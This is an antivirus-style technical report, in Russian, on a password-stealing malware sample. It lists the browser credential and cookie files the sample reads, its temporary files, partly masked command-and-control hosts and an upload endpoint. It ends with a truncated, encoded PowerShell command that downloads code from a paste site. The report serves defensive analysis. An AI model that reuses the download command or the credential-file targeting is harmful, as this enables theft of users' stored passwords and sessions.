Техническая информация
Вредоносные функции
Читает файлы, отвечающие за хранение паролей сторонними программами
- %LOCALAPPDATA%\google\chrome\user data\default\login data
- %APPDATA%\opera software\opera stable\login data
- %LOCALAPPDATA%\google\chrome\user data\default\cookies
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\46615.txt
Удаляет следующие файлы
- %TEMP%\46615.txt
Сетевая активность
Подключается к
- 'ra####.#00webhostapp.com':80
TCP
Запросы HTTP GET
- http://dp##te.com/B9M4X8F9Z.txt
- http://dp##te.com/FZ7DQD5TT.txt
- http://ra####.#00webhostapp.com/TPS_X4.php?me####################################################################################################################################################...
Запросы HTTP POST
- http://ra####.#00webhostapp.com/upload.php
UDP
- DNS ASK dp##te.com
- DNS ASK ap#.#y-ip.io
- DNS ASK ra####.#00webhostapp.com
Другое
Запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AZABwAGEAcwB0AGUALgBjAG8AbQAvAEYAWgA...
